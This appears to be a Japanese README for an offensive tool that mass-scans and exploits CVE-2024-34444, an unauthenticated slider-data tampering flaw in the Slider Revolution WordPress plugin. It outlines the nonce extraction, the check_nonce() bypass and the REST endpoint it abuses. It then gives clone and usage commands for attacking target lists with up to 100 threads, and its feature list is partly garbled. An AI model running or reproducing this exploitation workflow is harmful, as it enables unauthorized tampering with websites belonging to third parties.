
CVE-2024-34444(認証欠如)を標的とする、Slider Revolution WordPressプラグイン向けのマルチスレッド型マススキャナー。REST APIを介した非認証スライダーデータ改ざんのため、nonce抽出、バージョン検出、および悪用を自動化します。
Slider Revolution WordPressプラグイン < 6.7.0 に影響するCVE-2024-34444のプロフェッショナルマススキャナー
バナー
CVE-2024-34444は、Slider Revolution WordPressプラグイン(バージョン < 6.7.0)における認可欠落の脆弱性です。このスキャナーは、REST APIエンドポイント /wp-json/revslider/v1/slider/save を介した脆弱なインストールの検出と悪用を自動化します。
脆弱性の連鎖:
revslider_actions nonceを抽出check_nonce()をバイパスreadme.txt経由-v) 詳細ログ出力-o) 結果保存git clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Single target
python3 exploit.py -u https://target.com
# Single target with verbose
python3 exploit.py -u https://target.com -v
# Mass scan from list
python3 exploit.py -l targets.txt -t 20
# Mass scan with output file
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Full example with all options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v